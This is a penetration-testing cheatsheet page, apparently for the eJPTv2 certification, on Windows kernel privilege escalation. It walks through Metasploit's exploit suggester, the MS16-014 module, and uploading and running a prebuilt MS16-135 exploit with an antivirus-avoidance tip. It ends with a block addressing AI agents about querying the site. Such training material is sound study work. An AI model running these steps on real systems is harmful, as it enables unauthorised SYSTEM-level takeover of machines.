# Win Kernel Privesc

### Get access to the target and gain a meterpreter session and then follow the following technique :-

## #Local Privilege Escalation

```
# From the meterpreter session
getprivs

    Enabled Process Privileges
    ==========================
    Name
    ----
    SeChangeNotifyPrivilege
    SeIncreaseWorkingSetPrivilege

getsystem
    [-] priv_elevate_getsystem: Operation failed: 691 The following was attempted:
    [-] Named Pipe Impersonation (In Memory/Admin)
    [-] Named Pipe Impersonation (Dropper/Admin)
    [-] Token Duplication (In Memory/Admin)
    [-] Named Pipe Impersonation (RPCSS variant)
    [-] Named Pipe Impersonation (PrintSpooler variant)
    [-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)
# failed
```

* Enumerate Windows Kernel vulnerabilities with Metasploit

Copy

```
background
search suggester
use post/multi/recon/local_exploit_suggester
sessions
set SESSION 7
run
```

<figure><img src="/files/9HpzUmy25ozMEcGikvkA" alt="" width="563"><figcaption></figcaption></figure>

* `e.g.` [Windows WMI Receive Notification Exploit - ms16\_014\_wmi\_recv\_notif](https://www.rapid7.com/db/modules/exploit/windows/local/ms16_014_wmi_recv_notif/)
  * *This module exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl*

```
use exploit/windows/local/ms16_014_wmi_recv_notif
set SESSION 7
set LPORT 4422
exploit
```

<figure><img src="/files/FErofJ2qFYVVvvD44oZv" alt="" width="563"><figcaption></figcaption></figure>

* By using a kernel exploit for this specific version of Windows O.S., the attacker is able to get a `meterpreter` session with **elevated privileges.**

## #Manual Privilege Escalation

**Windows-Exploit-Suggester**

* Open a Kali VM terminal session and use [Windows-Exploit-Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester)

```
mkdir Windows-Exploit-Suggester
cd Windows-Exploit-Suggester
wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/f34dcc186697ac58c54ebe1d32c7695e040d0ecb/windows-exploit-suggester.py
# ^^ This is a python3 version of the script

cd Windows-Exploit-Suggester
python ./windows-exploit-suggester.py --update
    [*] initiating winsploit version 3.3...
    [+] writing to file 2023-03-15-mssb.xls
    [*] done
pip install xlrd --upgrade
```

* Use <https://cloudconvert.com/xlsx-to-xls> to convert the `2023-03-15-mssb.xls` file to `.xlsx` and back to `.xls`
* Run the script

Copy

```
./windows-exploit-suggester.py --database 2023-03-15-mssb.xls --systeminfo win2008r2-systeminfo.txt
```

<figure><img src="/files/vRHlhMIs6stKH4uZQxgc" alt=""><figcaption></figcaption></figure>

**MS16-135**

* [Microsoft Windows Kernel - 'win32k' Denial of Service (MS16-135)](https://www.exploit-db.com/exploits/40745)
* [Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Local Privilege Escalation (MS16-135) (2)](https://www.exploit-db.com/exploits/41015/)

```
[E]MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*]  https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*]  https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*]  https://github.com/tinysec/public/tree/master/CVE-2016-7255
```

* Search **`MS16-135`** in the [**windows-kernel-exploits**](https://github.com/SecWiki/windows-kernel-exploits) github repository
  * [MS16-135 exploit](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-135)
  * check the [41015.c](https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS16-135/41015.c) `C` file to check if the code does what it's supposed to
  * in this case I will use the pre-build executable `41015.exe`
* Knowing that the specific Windows version is vulnerable to this particular exploit, proceed with the exploitation

Use the `meterpreter` access to upload the `41015.exe` file to the `temp` directory within the Windows O.S.

```
cd C:\\
mkdir temp
cd temp\\
# Reduce the likelihood of antivirus detection by using the temp directory

upload 41015.exe
shell
.\41015.exe 7
```

<figure><img src="/files/MDosD7v1IpydwHS53EHH" alt="" width="563"><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://yashmehta.gitbook.io/ejptv2-cheatsheet/post-exploitation/privilege-escalation/windows-privilege-escalation/win-kernel-privesc.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.